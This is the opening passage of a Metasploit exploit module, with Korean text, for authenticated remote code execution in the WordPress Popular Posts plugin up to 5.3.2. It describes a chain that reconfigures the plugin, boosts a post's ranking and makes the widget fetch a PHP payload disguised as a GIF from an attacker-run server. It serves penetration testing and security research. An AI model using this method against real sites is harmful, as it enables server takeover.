
### 이 모듈은 Metasploit이 필요합니다: https://metasploit.com/download # 현재 소스: https://github.com/rapid7/metasploit-framework ##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ 이 익스플로잇은 Metasploit에 FQDN이 있어야 하며 포트 80, 443 또는 8080에서 페이로드 웹 서버를 실행할 수 있어야 합니다. 또한 FQDN은 예약된 주소(192/172/127/10)로 확인되어서는 안 됩니다. 서버는 GET 요청을 받기 전에 페이로드에 대한 HEAD 요청에도 응답해야 합니다. 이 익스플로잇은 Wordpress 플러그인 Popular Posts <= 5.3.2의 인증된 부적절한 입력 검증(improper input validation) 취약점을 악용합니다. 익스플로잇 체인은 다소 복잡합니다. 서버에는 인증이 필요하고 PHP용 'gd'도 필요합니다. 그런 다음 위젯의 게시물 이미지에 임의의 URL을 허용하도록 Popular Post 플러그인이 재구성됩니다. 게시물이 작성된 후, 이전 1위보다 인기도가 5만큼 높아지도록 해당 게시물에 요청이 전송됩니다. 게시물이 상위 5위 안에 들면, 60초(우리는 90초 대기) 서버 캐시 갱신 후 홈페이지 위젯이 로드되어 플러그인이 우리 서버에서 페이로드를 다운로드하게 됩니다. 페이로드에는 'GIF' 헤더와 이중 확장자('.gif.php')가 있어 임의의 PHP 코드를 실행할 수 있습니다. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https://blog.nintechnet.com/improper-input-validation-fixed-in-wo